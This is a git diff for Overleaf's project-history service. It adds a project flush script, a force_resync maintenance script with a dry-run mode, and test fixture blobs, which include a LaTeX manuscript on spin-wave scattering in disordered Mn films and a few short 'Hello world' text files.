+        return timestamp ? olderThan(maxAge, timestamp) : true
+      })
+    collectedProjects.push(...newProjects)
+  }
+  // sort the collected projects by ascending timestamp
+  collectedProjects.sort((a, b) => a.timestamp - b.timestamp)
+
+  console.log('number of projects to flush', collectedProjects.length)
+  console.log('number with null timestamps', nullCount)
+
+  const elapsedTime = Math.floor((Date.now() - SCRIPT_START_TIME) / 1000)
+  console.log('elapsed time', elapsedTime, 'seconds, buffer time', bufferTime)
+  const remainingTime = Math.max(interval - elapsedTime - bufferTime, 0)
+  console.log('remaining time', remainingTime, 'seconds')
+
+  const jobsPerSecond = Math.max(
+    Math.ceil(collectedProjects.length / Math.max(remainingTime, 60)),
+    1
+  )
+  console.log('interval', interval, 'seconds')
+  console.log('jobs per second', jobsPerSecond)
+  console.log('concurrency', concurrency)
+
+  const queue = new PQueue({
+    concurrency,
+    interval: 1000,
+    intervalCap: jobsPerSecond,
+  })
+
+  const taskFns = collectedProjects.map(project => {
+    return async () => {
+      try {
+        await flushProject(project)
+        return { status: 'fulfilled', value: project }
+      } catch (error) {
+        return { status: 'rejected', reason: error, project }
+      }
+    }
+  })
+
+  const results = await queue.addAll(taskFns)
+
+  console.log(
+    'finished after',
+    Math.floor((Date.now() - SCRIPT_START_TIME) / 1000),
+    'seconds'
+  )
+  // count the number of successful and failed flushes
+  const success = results.filter(r => r.status === 'fulfilled').length
+  const failed = results.filter(r => r.status === 'rejected').length
+  console.log('completed', { success, failed })
+}
+
+main()
+  .then(() => {
+    process.exit(0)
+  })
+  .catch(err => {
+    console.error(err)
+    process.exit(1)
+  })
diff --git a/services/project-history/scripts/force_resync.js b/services/project-history/scripts/force_resync.js
new file mode 100755
index 0000000..13e7d3c
--- /dev/null
+++ b/services/project-history/scripts/force_resync.js
@@ -0,0 +1,233 @@
+#!/usr/bin/env node
+
+// To run in dev:
+//
+// docker compose run --rm project-history scripts/force_resync.js
+//
+// In production:
+//
+// docker run --rm $(docker ps -lq) scripts/force_resync.js
+
+import async from 'async'
+import Settings from '@overleaf/settings'
+import redis from '@overleaf/redis-wrapper'
+import { db, ObjectId } from '../app/js/mongodb.js'
+import * as SyncManager from '../app/js/SyncManager.js'
+import * as UpdatesProcessor from '../app/js/UpdatesProcessor.js'
+
+const rclient = redis.createClient(Settings.redis.project_history)
+const Keys = Settings.redis.project_history.key_schema
+
+const argv = process.argv.slice(2)
+const limit = parseInt(argv[0], 10) || null
+const force = argv[1] === 'force' || false
+let projectNotFoundErrors = 0
+let projectImportedFromV1Errors = 0
+const projectsNotFound = []
+const projectsImportedFromV1 = []
+let projectNoHistoryIdErrors = 0
+let projectsFailedErrors = 0
+const projectsFailed = []
+let projectsBrokenSyncErrors = 0
+const projectsBrokenSync = []
+
+function checkAndClear(project, callback) {
+  const projectId = project.project_id
+  console.log('checking project', projectId)
+
+  // These can probably also be reset and their overleaf.history.id unset
+  // (unless they are v1 projects).
+
+  function checkNotV1Project(cb) {
+    db.projects.findOne(
+      { _id: new ObjectId(projectId) },
+      { projection: { overleaf: true } },
+      (err, result) => {
+        console.log(
+          '1. looking in mongo projects collection: err',
+          err,
+          'result',
+          JSON.stringify(result)
+        )
+        if (err) {
+          return cb(err)
+        }
+        if (!result) {
+          return cb(new Error('project not found in mongo'))
+        }
+        if (result && result.overleaf && !result.overleaf.id) {
+          if (result.overleaf.history && result.overleaf.history.id) {
+            console.log(
+              ' - project is not imported from v1 and has a history id - ok to resync'
+            )
+            return cb()
+          } else {
+            console.log(
+              ' - project is not imported from v1 but does not have a history id'
+            )
+            return cb(new Error('no history id'))
+          }
+        } else {
+          cb(new Error('project is imported from v1 - will not resync it'))
+        }
+      }
+    )
+  }
+
+  function startResync(cb) {
+    if (force) {
+      console.log('2. starting resync for', projectId)
+      SyncManager.startHardResync(projectId, err => {
+        if (err) {
+          console.log('ERR', JSON.stringify(err.message))
+          return cb(err)
+        }
+        setTimeout(cb, 3000) // include a delay to allow the request to be processed
+      })
+    } else {
+      console.log('2. dry run, would start resync for', projectId)
+      cb()
+    }
+  }
+
+  function forceFlush(cb) {
+    if (force) {
+      console.log('3. forcing a flush for', projectId)
+      UpdatesProcessor.processUpdatesForProject(projectId, err => {
+        console.log('err', err)
+        return cb(err)
+      })
+    } else {
+      console.log('3. dry run, would force a flush for', projectId)
+      cb()
+    }
+  }
+
+  function watchRedisQueue(cb) {
+    const key = Keys.projectHistoryOps({ project_id: projectId })
+    function checkQueueEmpty(_callback) {
+      rclient.llen(key, (err, result) => {
+        console.log('LLEN', projectId, err, result)
+        if (err) {
+          return _callback(err)
+        }
+        if (result === 0) {
+          _callback()
+        } else {
+          _callback(new Error('queue not empty'))
+        }
+      })
+    }
+    if (force) {
+      console.log('4. checking redis queue key', key)
+      async.retry({ times: 30, interval: 1000 }, checkQueueEmpty, err => {
+        cb(err)
+      })
+    } else {
+      console.log('4. dry run, would check redis key', key)
+      cb()
+    }
+  }
+
+  function checkMongoFailureEntry(cb) {
+    if (force) {
+      console.log('5. checking key in mongo projectHistoryFailures', projectId)
+      db.projectHistoryFailures.findOne(
+        { project_id: projectId },
+        { projection: { _id: 1 } },
+        (err, result) => {
+          console.log('got result', err, result)
+          if (err) {
+            return cb(err)
+          }
+          if (result) {
+            return cb(new Error('failure record still exists'))
+          }
+          return cb()
+        }
+      )
+    } else {
+      console.log('5. would check failure record for', projectId, 'in mongo')
+      cb()
+    }
+  }
+
+  // do the checks and deletions
+  async.waterfall(
+    [
+      checkNotV1Project,
+      startResync,
+      forceFlush,
+      watchRedisQueue,
+      checkMongoFailureEntry,
+    ],
+    err => {
+      if (!err) {
+        return setTimeout(callback, 1000) // include a 1 second delay
+      } else if (err.message === 'project not found in mongo') {
+        projectNotFoundErrors++
+        projectsNotFound.push(projectId)
+        return callback()
+      } else if (err.message === 'no history id') {
+        projectNoHistoryIdErrors++
+        return callback()
+      } else if (
+        err.message === 'project is imported from v1 - will not resync it'
+      ) {
+        projectImportedFromV1Errors++
+        projectsImportedFromV1.push(projectId)
+        return callback()
+      } else if (
+        err.message === 'history store a non-success status code: 422'
+      ) {
+        projectsFailedErrors++
+        projectsFailed.push(projectId)
+        return callback()
+      } else if (err.message === 'sync ongoing') {
+        projectsBrokenSyncErrors++
+        projectsBrokenSync.push(projectId)
+        return callback()
+      } else {
+        console.log('error:', err)
+        return callback()
+      }
+    }
+  )
+}
+
+async function main() {
+  const results = await db.projectHistoryFailures.find().toArray()
+
+  console.log('number of failure records =', results.length)
+  // now check each project and start a resync
+  async.eachSeries(results.slice(0, limit), checkAndClear, err => {
+    console.log('Final error status', err)
+    console.log(
+      'Project flush failed again errors',
+      projectsFailedErrors,
+      projectsFailed
+    )
+    console.log(
+      'Project flush ongoing errors',
+      projectsBrokenSyncErrors,
+      projectsBrokenSync
+    )
+    console.log(
+      'Project not found errors',
+      projectNotFoundErrors,
+      projectsNotFound
+    )
+    console.log('Project without history_id errors', projectNoHistoryIdErrors)
+    console.log(
+      'Project imported from V1 errors',
+      projectImportedFromV1Errors,
+      projectsImportedFromV1
+    )
+    process.exit()
+  })
+}
+
+main().catch(error => {
+  console.error(error)
+  process.exit(1)
+})
diff --git a/services/project-history/test/acceptance/fixtures/blobs/35c9bd86574d61dcadbce2fdd3d4a0684272c6ea b/services/project-history/test/acceptance/fixtures/blobs/35c9bd86574d61dcadbce2fdd3d4a0684272c6ea
new file mode 100644
index 0000000..35c9bd8
--- /dev/null
+++ b/services/project-history/test/acceptance/fixtures/blobs/35c9bd86574d61dcadbce2fdd3d4a0684272c6ea
@@ -0,0 +1,404 @@
+% Choose pra, prb, prc, prd, pre, prl, prstab, or rmp for journal
+% Add 'draft' option to mark overfull boxes with black boxes
+% Add 'showpacs' option to make PACS codes appear
+% for review and submission
+%\documentclass[aps,preprint,showpacs,superscriptaddress,groupedaddress]{revtex4} % for double-spaced preprint
+% needed for figures
+% needed for some tables
+% for math
+% for math
+% for crossing out text
+% for coloring text
+%\input{tcilatex}
+
+
+\documentclass[aps,prl,twocolumn,showpacs,superscriptaddress,groupedaddress]{revtex4}
+
+\usepackage{graphicx}
+\usepackage{dcolumn}
+\usepackage{bm}
+\usepackage{amssymb}
+\usepackage{soul}
+\usepackage{color}
+
+%TCIDATA{OutputFilter=LATEX.DLL}
+%TCIDATA{Version=5.50.0.2960}
+%TCIDATA{<META NAME="SaveForMode" CONTENT="1">}
+%TCIDATA{BibliographyScheme=BibTeX}
+%TCIDATA{LastRevised=Tuesday, May 20, 2014 03:06:00}
+%TCIDATA{<META NAME="GraphicsSave" CONTENT="32">}
+
+\hyphenation{ALPGEN}
+\hyphenation{EVTGEN}
+\hyphenation{PYTHIA}
+\def\be{\begin{equation}}
+\def\ee{\end{equation}}
+\def\bea{\begin{eqnarray}}
+\def\eea{\end{eqnarray}}
+%\input{tcilatex}
+
+\begin{document} + +\title{Transport measurements of the spin wave gap of Mn} +\input author_list.tex +\date{\today} + +\begin{abstract} +Temperature dependent transport measurements on ultrathin antiferromagnetic +Mn films reveal a heretofore unknown non-universal weak localization +correction to the conductivity which extends to disorder strengths greater than +100~k$\Omega$ per square. The inelastic scattering of electrons off of +gapped antiferromagnetic spin waves gives rise to an inelastic scattering +length which is short enough to place the system in the 3D regime. The +extracted fitting parameters provide estimates of the energy gap ($\Delta +\approx$~16~K) and exchange energy ($\bar{J} \approx$~320~K). %\st{which are in +%agreement with values obtained with other techniques}. +\end{abstract} + +\pacs{75} + +\maketitle + +Hello world + + + +Thin-film transition metal ferromagnets (Fe, Co, Ni, Gd) and +antiferromagnets (Mn, Cr) and their alloys are not only ubiquitous in +present day technologies but are also expected to play an important role in +future developments~\cite{thompson_2008}. Understanding magnetism in these +materials, especially when the films are thin enough so that disorder plays +an important role, is complicated by the long standing controversy about the +relative importance of itinerant and local moments~\cite% +{slater_1936,van_vleck_1953,aharoni_2000}. For the itinerant transition +metal magnets, a related fundamental issue centers on the question of how +itinerancy is compromised by disorder. Clearly with sufficient disorder the +charge carriers become localized, but questions arise as to what happens to +the spins and associated spin waves and whether the outcome depends on the +ferro/antiferro alignment of spins in the itinerant parent. Ferromagnets +which have magnetization as the order parameter are fundamentally different +than antiferromagnets which have staggered magnetization (i.e., difference +between the magnetization on each sublattice) as the order parameter~\cite% +{blundell_2001}. Ferromagnetism thus distinguishes itself by having soft +modes at zero wave number whereas antiferromagnets have soft modes at finite +wave number~\cite{belitz_2005}. Accordingly, the respective spin wave +spectrums are radically different. These distinctions are particularly +important when comparing quantum corrections to the conductivity near +quantum critical points for ferromagnets~\cite{paul_2005} and +antiferromagnets~\cite{syzranov_2012}. + +Surprisingly, although there have been systematic studies of the effect of +disorder on the longitudinal $\sigma_{xx}$ and transverse $\sigma_{xy}$ +conductivity of ferromagnetic films~\cite% +{bergmann_1978,bergmann_1991,mitra_2007,misra_2009,kurzweil_2009}, there +have been few if any such studies on antiferromagnetic films. In this paper +we remedy this situation by presenting transport data on systematically +disordered Mn films that are sputter deposited in a custom designed vacuum +chamber and then transferred without exposure to air into an adjacent +cryostat for transport studies to low temperature. The experimental +procedures are similar to those reported previously: disorder, characterized +by the sheet resistance $R_0$ measured at $T=$~5~K, can be changed either by +growing separate samples or by gentle annealing of a given sample through +incremental stages of disorder~\cite{misra_2011}. Using these same procedures our results for +antiferromagnets however are decidedly different. 
The data are well +described over a large range of disorder strengths by a non-universal three +dimensional (3d) quantum correction that applies only to spin wave gapped +antiferromagnets. This finding implies the presence of strong inelastic +electron scattering off of antiferromagnetic spin waves. The theory is +validated not only by good fits to the data but also by extraction from the +fitting parameters of a value for the spin wave gap $\Delta$ that is in +agreement with the value expected for Mn. On the other hand, the +exchange energy $\bar{J}$ could be sensitive to the high disorder in our +ultra thin films, and it turns out to be much smaller compared to the known values. + +In previous work the inelastic scattering of electrons off of spin waves has +been an essential ingredient in understanding disordered ferromagnets. For +example, to explain the occurrence of weak-localization corrections to the +anomalous Hall effect in polycrystalline Fe films~\cite{mitra_2007}, it was +necessary to invoke a contribution to the inelastic phase breaking rate $% +\tau_{\varphi}^{-1}$ due to spin-conserving inelastic scattering off +spin-wave excitations. This phase breaking rate, anticipated by theory~\cite% +{tatara_2004} and seen experimentally in spin polarized electron energy loss +spectroscopy (SPEELS) measurements of ultrathin Fe films~\cite% +{plihal_1999,zhang_2010}, is linear in temperature and significantly larger +than the phase breaking rate due to electron-electron interactions, thus +allowing a wide temperature range to observe weak localization corrections~% +\cite{mitra_2007}. The effect of a high $\tau_{\varphi}^{-1}$ due to +inelastic scattering off spin-wave excitations is also seen in Gd films +where in addition to a localizing log($T$) quantum correction to the +conductance, a localizing linear-in-$T$ quantum correction is present and is +interpreted as a spin-wave mediated Altshuler-Aronov type correction to the +conductivity~\cite{misra_2009}. + +Interestingly, this high rate of inelastic spin rate scattering becomes even +more important for the thinnest films as shown in theoretical calculations +on Fe and Ni which point to extremely short spin-dependent inelastic mean +free paths~\cite{hong_2000} and in spin-polarized electron energy-loss +spectroscopy (SPEELS) measurements on few monolayer-thick Fe/W(110) films in +which a strong nonmonotonic enhancement of localized spin wave energies is +found on the thinnest films~\cite{zhang_2010}. + +Inelastic spin wave scattering in highly disordered ferromagnetic films can +be strong enough to assure that the associated $T$-dependent dephasing +length $L_{\varphi }(T)=\sqrt{D\tau _{\varphi }}$ (with $D$ the diffusion +constant)~\cite{lee_1985} is less than the film thickness $t$, thus putting +thin films into the 3d limit where a metal-insulator +transition is observed~\cite{misra_2011}. Recognizing that similarly high +inelastic scattering rates must apply to highly disordered antiferromagnetic +films, we first proceed with a theoretical approach that takes into account +the scattering of antiferromagnetic spin waves on the phase relaxation rate +and find a heretofore unrecognized non-universal 3d weak localization +correction to the conductivity that allows an interpretation of our experimental +results. 
+
+We mention in passing that the 3d interaction-induced quantum correction
+found to be dominant in the case of ferromagnetic Gd films which undergo a
+metal-insulator transition\cite{misra_2011} is found to be much smaller in
+the present case and will not be considered further (for an estimate of
+this contribution see \cite{muttalib_unpub}).
+
+As discussed in detail in Ref.~[\onlinecite{wm10}], the phase relaxation
+time $\tau _{\varphi }$ limits the phase coherence in a particle-particle
+diffusion propagator $C(q,\omega )$ (Cooperon) in the form
+\begin{equation}
+C(q,\omega _{l})=\frac{1}{2\pi N_{0}\tau ^{2}}\frac{1}{Dq^{2}+|\omega
+_{l}|+1/\tau _{\varphi }}.
+\end{equation}
+where $N_{0}$ is the density of states at the Fermi level, $\tau $ is the
+elastic scattering time and $\omega _{l}=2\pi lT$ is the Matsubara
+frequency. Labeling the Cooperon propagator in the absence of interactions
+as $C_{0}$, we can write
+\begin{equation}
+\frac{1}{\tau _{\varphi }}=\frac{1}{2\pi N_{0}\tau ^{2}}[C^{-1}-C_{0}^{-1}].
+\end{equation}
+
+In general, $C(q,\omega )$ can be evaluated diagrammatically in the presence
+of interactions and disorder in a ladder approximation \cite{fa} that can be
+symbolically written as $C=C_{0}+C_{0}KC$ where the interaction vertex $K$
+contains self energy as well as vertex corrections due to both interactions
+and disorder. It then follows that $1/\tau _{\varphi }$ is given by
+\begin{equation}
+\frac{1}{\tau _{\varphi }}=-\frac{1}{2\pi N_{0}\tau ^{2}}K.
+\end{equation}%
+In Ref.~[\onlinecite{wm10}], the leading temperature and disorder dependence
+of the inelastic diffusion propagator was evaluated diagrammatically, in the
+presence of ferromagnetic spin-wave mediated electron-electron interactions.
+Here we consider the antiferromagnetic case. We only consider a large
+spin-wave gap, where the damping can be ignored. Using the antiferromagnetic
+dispersion relation $\omega _{q}=\Delta +Aq$, where $A$ is the spin
+stiffness, the inelastic lifetime is given by
+\be
+\frac{\hbar }{\tau _{\varphi }}=\frac{4}{\pi \hbar }nJ^{2}\int_{0}^{1/l}%
+\frac{q^{d-1}dq}{\sinh \beta \omega _{q}}\frac{Dq^{2}+1/\tau _{\varphi }}{%
+(Dq^{2}+1/\tau _{\varphi })^{2}+\omega _{q}^{2}}
+\ee%
+where $n=k_{F}^{3}/3\pi ^{2}$ is the 3d density, $J$ is the effective
+spin-exchange interaction and $\beta =1/k_{B}T$. Here we will consider the
+limit $\hbar /\tau _{\varphi }\ll \Delta $, relevant for our experiment on
+Mn. In this limit we can neglect the $1/\tau _{\varphi }$ terms inside the
+integral. The upper limit should be restricted to $\Delta /A$ in the limit $%
+\Delta /A<1/l$. For large disorder, we expect the parameter $x\equiv
+\hbar Dk_{F}^{2}\Delta / \bar{J}^{2}\ll 1$, where the spin-exchange energy
+is given by $\bar{J}=Ak_{F}$. In this limit, $L_{\varphi }$ can be
+simplified as
+\be
+k_{F}L_{\varphi }\approx \left( \frac{\bar{J}}{\Delta }\right) ^{3/2}\left(
+\frac{5\sinh \frac{\Delta }{T}}{12\pi }\right) ^{1/2},\;\;\;x\ll 1
+\label{L-phi-3d}
+\ee%
+which is independent of $x$, and therefore, independent of disorder.
+
+Given the inelastic lifetime, the weak localization correction in 3d is
+usually given by \cite{lee_1985} $\delta \sigma _{3d}=\frac{e^{2}}{\hbar \pi
+^{3}}\frac{1}{L_{\varphi }},$ where the prefactor to the inverse inelastic
+length is a universal number, independent of disorder.
However, at large +enough disorder, we show that there exists a disorder dependent correction, +due to the scale dependent diffusion coefficient near the Anderson +metal-insulator transition. In fact, the diffusion coefficient obeys the +self consistent equation \cite{WV} +\begin{equation} +\frac{D_{0}}{D(\omega )}=1+\frac{k_{F}^{2-d}}{\pi m}\int_{0}^{1/l}dQ\frac{% +Q^{d-1}}{-i\omega +D(\omega )Q^{2}} +\end{equation}% +where $D_{0}=v_{F}l/d$ is the diffusion coefficient at weak disorder. While +the significance of the prefactor to the integral is not clear, the above +equation remains qualitatively accurate over a wide range near the Anderson +transition. Setting $\omega =i/\tau _{\varphi }$ and doing the $Q$-integral +in 3d, +\bea +\frac{D_{0}}{D} &\approx & 1+\frac{1}{\pi mk_{F}}\int_{1/L_{\phi }}^{1/l}dQ\frac{% +Q^{2}}{DQ^{2}}\cr +&=& 1+\frac{D_{0}}{D}\frac{3}{\pi k_{F}^{2}l^{2}}-\delta +\left( \frac{D_{0}}{D}\right) , +\label{delta} +\eea% +where +\bea +\delta \equiv \frac{D_{0}}{D}\frac{3}{\pi k_{F}^{2}l^{2}}\frac{l}{% +L_{\varphi }} +\eea +is assumed to be a small correction, and Eq.~(\ref{delta}) +should not be solved self-consistently. This follows from the fact that the +diffusion coefficient of electrons at fixed energy entering the Cooperon +expression is that of non-interacting electrons, and is given by the limit $% +T\rightarrow 0$, $L_{\varphi }\rightarrow \infty $ and therefore $\delta +\rightarrow 0$. Then the correction at finite $T$ is given by +\bea +\frac{D}{D_{0}} &=& \frac{1}{\left( \frac{D_{0}}{D}\right) _{0}-\delta \left( +\frac{D_{0}}{D}\right) }\cr +&\approx & \left( \frac{D}{D_{0}}\right) _{0}+\left( \frac{D}{D_{0}}\right) _{0} +\frac{3}{\pi k_{F}^{2}l^{2}}\frac{l}{L_{\varphi }}% +\eea% +where +\be +\lim_{T\rightarrow 0}\frac{D}{D_{0}}\equiv \left( \frac{D}{D_{0}}\right) +_{0}. +\ee% +Using the relation $\sigma _{3d}=(e^{2}/\hbar )nD$ where the longitudinal +sheet conductance $\sigma _{\square }=\sigma _{3d}t$, with $t$ being the +film thickness, we finally get the temperature dependent weak localization +correction term +\bea +\frac{\delta \sigma _{\square }}{L_{00}} &=& \left( \frac{D}{D_{0}}\right) _{0}% +\frac{2}{\pi }\frac{t}{L_{\varphi }}\cr +\left( \frac{D}{D_{0}}\right)_{0} &\approx &\frac{2}{1+\sqrt{1+\frac{4R_{0}^{2}}{a^{2}}}} +\label{WL} +\eea% +where $R_{0}=L_{00}/\sigma _{\square }(T$=$0)$, $L_{00}=e^{2}/\pi h$, $% +a=3\pi/2k_{F}tb_{0}$, $b_{0}$ is a number of order unity and we +have solved the self-consistent equation for $D$ in order to express $D_{0% +\text{ }}$in terms of $D$ and finally $R_{0}$. Thus in this case, the weak +localization correction has a prefactor which is not universal. While this +reduces to the well-known universal result at weak disorder $R_{0}\ll a$, it +becomes dependent on disorder characterized by the sheet resistance $R_{0}$ +at strong disorder and at the same time substantially extends the 3d regime +near the transition. 
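+
+% Illustrative numerical check of the two expressions above (not from the
+% original manuscript's fits; assumes the values Delta ~ 16 K, Jbar ~ 320 K
+% and k_F ~ 1.7E10 1/m quoted in the text): at T = Delta,
+% (Jbar/Delta)^{3/2} = 20^{3/2} ~ 89 and (5 sinh(1)/(12 pi))^{1/2} ~ 0.39,
+% so k_F L_phi ~ 35, i.e. L_phi ~ 2 nm, comparable to the film thickness
+% t = 2 nm. Likewise the prefactor (D/D_0)_0 = 2/(1+sqrt(1+4 R_0^2/a^2))
+% tends to 1 for R_0 << a, and with a = 28 kOhm gives ~ 0.62 at
+% R_0 = 28 kOhm and ~ 0.35 at R_0 = 63.9 kOhm.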
+
+Substituting the expression for $L_{\varphi }$ (Eq.~(\ref{L-phi-3d})) into
+Eq.~(\ref{WL}), we finally obtain the total conductivity, including the
+quantum correction to the conductivity due to weak localization in 3d
+arising from scattering of electrons off antiferromagnetic spin waves in Mn,
+\begin{equation}
+\frac{\sigma _{\square }}{L_{00}}=A+\frac{B}{\sqrt{\sinh [\Delta /T]}},
+\label{sigmaWL}
+\end{equation}%
+where the parameter $A$ is temperature independent and the parameter
+\bea
+B &\equiv & \left( \frac{D}{D_{0}}\right) _{0}\frac{2}{\pi ^{2}}\left( \frac{%
+12\pi }{5}\right) ^{1/2}\left( \frac{\Delta }{\bar{J}}\right) ^{3/2}tk_{F}\cr%
+&=&\frac{2c}{1+\sqrt{1+\frac{4R_{0}^{2}}{a^{2}}}},
+\label{BFit}
+\eea%
+where
+\be
+c\equiv \left( \frac{\Delta }{\bar{J}}\right) ^{3/2}\left( \frac{%
+48t^{2}k_{F}^{2}}{5\pi}\right) ^{1/2}.
+\label{cFit}
+\ee
+
+The data presented here are for a single film prepared with an initial $R_0
+\approx$~6~k$\Omega$. Disorder was subsequently increased in incremental
+stages up to 180~k$\Omega$ by annealing at approximately 280~K~\cite{%
+misra_2011}. Additional samples were grown at intermediate disorder and
+measured to check reproducibility.
+
+Figure~\ref{fig:cond} shows the conductivity data for two samples with
+disorder $R_{0}=$~17573~$\Omega $ and 63903~$\Omega $ with corresponding
+fittings to the expression (\ref{sigmaWL}) where $A$ and $B$ are taken as
+fitting parameters and $\Delta =$~16~K is the spin wave gap. The fits are
+sensitive to the parameters $A$ and $B$ but relatively insensitive to $%
+\Delta $. We find that $\Delta =$~16~$\pm $~4~K provides good fittings in
+the whole range of disorder (from 6 to 180~k$\Omega $).
+
+\begin{figure}[tbp]
+\begin{center}
+\includegraphics[width=9cm]{fig_1_16.eps}
+\end{center}
+\caption{The temperature-dependent normalized conductivity (open squares)
+for two samples with the indicated disorder strengths of $R_0 =$~17573~$%
+\Omega$ and 63903~$\Omega$ shows good agreement with theory (solid lines).
+The fitting parameters $A$ and $B$ are indicated for each curve with the
+error in the least significant digit indicated in parentheses.}
+\label{fig:cond}
+\end{figure}
+
+Figure~\ref{fig:parb} shows the dependence of the parameter $B$ on the
+disorder strength $R_0$ (open squares) and a theoretical fit (solid line)
+using Eq.~(\ref{BFit}), where $c$ and $a$ are fitting parameters. The solid
+line for this two-parameter fit is drawn for the best-fit values $c=0.67 \pm
+0.04$ and $a= 28 \pm 3$~k$\Omega$. We note that the fit is of reasonable
+quality over most of the disorder range except for the film with the least
+disorder ($R_0 = 6$~k$\Omega$) where $B = 0.77$,
+somewhat above the saturated value
+$B = c = 0.67$ evaluated from Eq.~(\ref{BFit}) at $R_0 = 0$. Using higher
+values of $c$ (e.g., $c=0.8$) and lower values of $a$ (e.g., $a = 22$~k$\Omega$)
+improves the fit at low disorder strengths but
+increases the discrepancy at higher disorder strengths.
+
+%L_phi/t = 2/pi*2/(1+sqrt(1+16))/0.5, 2/pi*2/(1+sqrt(1+1))/0.25
+
+%http://hyperphysics.phy-astr.gsu.edu/hbase/tables/fermi.html , k_F = sqrt(2*m_e*(10.9 eV))/(hbar) = 1.7E10 1/m
+
+% (bar(J) / \Delta) ^ 3/2 = (48*(2e-9)^2*(2.7e9)^2/5/pi/(0.65)^2) ^0.5 = 8360 = 20 ^ 3
+%A = \bar{J} / k_F , \bar{J} = nJ
+
+Substituting the Fermi energy for bulk Mn~\cite{ashcroft_1976},
+a thickness $t=2$~nm known to 20\% accuracy, together with the best-fit
+value for $c$ into Eq.~(\ref{cFit}), we calculate the value $\bar{J} =$~320~$%
+\pm$~93~K.
Gao et al.~\cite{gao_2008} performed inelastic scanning tunneling
spectroscopy (ISTS) on thin Mn films and reported $\Delta$ in the range from
30 to 60~K and $\bar{J}=vk_F=$~3150~$\pm$~200~K. The agreement of energy gaps is
good; however, our significantly lower value of $\bar{J}$ is probably due to the
high disorder in our ultrathin films.

Since the temperature-dependent correction $B/\sqrt{\sinh (\Delta /T)}$ of
Eq.~(\ref{sigmaWL}) is small compared to the parameter $A$, we can write
$\sigma_{\square} \approx 1/R_0$ so that Eq.~(\ref{sigmaWL}) reduces to the
expression $A \approx 1/L_{00}R_0$. Taking the logarithm of both sides of
this approximation yields the plot shown in the inset of
Fig.~\ref{fig:parb}. The slope of $-1$ confirms the linear dependence of $A$ on
$1/R_0$, and the intercept of 5.01 (10$^{5.01}\approx $~102~k$\Omega$) is
within 20\% of the expected theoretical value $1/L_{00}=$~81~k$\Omega $
for the inverse normalization constant. Accordingly, the conductivity corrections in
Eq.~(\ref{sigmaWL}) are small compared to the zero-temperature conductivity, and
the normalization constant $L_{00}$ for the conductivity is close to the
expected theoretical value.

Using Eq.~(\ref{WL}) and the obtained value for $a\approx $~28~k$\Omega $, we can
compare the dephasing length ($L_{\varphi }$) with the thickness ($t\approx $%
~2~nm) at 16~K. For the sample with $R_{0}=$~63903~$\Omega $ the ratio $%
L_{\varphi }/t\approx $~0.5, and for the sample with $R_{0}=$~17573~$\Omega $
$L_{\varphi }/t\approx $~2. The latter estimate assumes no spin
polarization, while a full polarization would imply $L_{\varphi }/t\approx $%
~1. Thus $L_{\varphi }$ is smaller than or close to the thickness of the
film, which keeps the film in the three-dimensional regime for almost all
temperatures and disorder strengths considered.

\begin{figure}[tbp]
\begin{center}
\includegraphics[width=9cm]{fig_2_16.eps}
\end{center}
\caption{Dependence of the fitting parameters $B$ and $A$ (inset) on
disorder $R_0$ for $\Delta=$~16~K. The fitting parameters are indicated for
each curve with the error in the least significant digit indicated in
parentheses.}
\label{fig:parb}
\end{figure}

In conclusion, we have performed \textit{in situ} transport measurements on
ultrathin Mn films, systematically varying the disorder ($R_{0}=R_{xx}$($T=$%
~5~K)). The obtained data were analyzed within a weak localization theory in
3d generalized to strong disorder. In the temperature range considered,
inelastic scattering off spin waves is found to be strong, giving rise to a
dephasing length shorter than the film thickness, which places these systems
into the 3d regime. The obtained value for the spin wave gap was close to
the one measured by Gao et al.~\cite{gao_2008} using ISTS, while the
exchange energy was much smaller.

This work has been supported by the NSF under Grant No.~1305783 (AFH).
PW thanks A.\ M.\ Finkel'stein for useful discussions and acknowledges
partial support through the DFG research unit ``Quantum phase transitions''.
+ +\bibliographystyle{apsrev} +\bibliography{bibl} + +\end{document} diff --git a/services/project-history/test/acceptance/fixtures/blobs/4f785a4c192155b240e3042b3a7388b47603f423 b/services/project-history/test/acceptance/fixtures/blobs/4f785a4c192155b240e3042b3a7388b47603f423 new file mode 100644 index 0000000..4f785a4 --- /dev/null +++ b/services/project-history/test/acceptance/fixtures/blobs/4f785a4c192155b240e3042b3a7388b47603f423 @@ -0,0 +1,3 @@ +Hello world + +One two three \ No newline at end of file diff --git a/services/project-history/test/acceptance/fixtures/blobs/c6654ea913979e13e22022653d284444f284a172 b/services/project-history/test/acceptance/fixtures/blobs/c6654ea913979e13e22022653d284444f284a172 new file mode 100644 index 0000000..c6654ea --- /dev/null +++ b/services/project-history/test/acceptance/fixtures/blobs/c6654ea913979e13e22022653d284444f284a172 @@ -0,0 +1,5 @@ +Hello world + +One two three + +Four five six \ No newline at end of file diff --git a/services/project-history/test/acceptance/fixtures/blobs/e13c315d53aaef3aa34550a86b09cff091ace220 b/services/project-history/test/acceptance/fixtures/blobs/e13c315d53aaef3aa34550a86b09cff091ace220 new file mode 100644 index 0000000..e13c315 --- /dev/null +++ b/services/project-history/test/acceptance/fixtures/blobs/e13c315d53aaef3aa34550a86b09cff091ace220 @@ -0,0 +1,7 @@ +Hello world + +One two three + +Four five six + +Seven eight nine \ No newline at end of file diff --git a/services/project-history/test/acceptance/fixtures/blobs/f28571f561d198b87c24cc6a98b78e87b665e22d b/services/project-history/test/acceptance/fixtures/blobs/f28571f561d198b87c24cc6a98b78e87b665e22d new file mode 100644 index 0000000..f28571f --- /dev/null +++ b/services/project-history/test/acceptance/fixtures/blobs/f28571f561d198b87c24cc6a98b78e87b665e22d @@ -0,0 +1,404 @@ +% Choose pra, prb, prc, prd, pre, prl, prstab, or rmp for journal +% Add 'draft' option to mark overfull boxes with black boxes +% Add 'showpacs' option to make PACS codes appear +% for review and submission +%\documentclass[aps,preprint,showpacs,superscriptaddress,groupedaddress]{revtex4} % for double-spaced preprint +% needed for figures +% needed for some tables +% for math +% for math +% for crossing out text +% for coloring text +%\input{tcilatex} + + +\documentclass[aps,prl,twocolumn,showpacs,superscriptaddress,groupedaddress]{revtex4} + +\usepackage{graphicx} +\usepackage{dcolumn} +\usepackage{bm} +\usepackage{amssymb} +\usepackage{soul} +\usepackage{color} + +%TCIDATA{OutputFilter=LATEX.DLL} +%TCIDATA{Version=5.50.0.2960} +%TCIDATA{<META NAME="SaveForMode" CONTENT="1">} +%TCIDATA{BibliographyScheme=BibTeX} +%TCIDATA{LastRevised=Tuesday, May 20, 2014 03:06:00} +%TCIDATA{<META NAME="GraphicsSave" CONTENT="32">} + +\hyphenation{ALPGEN} 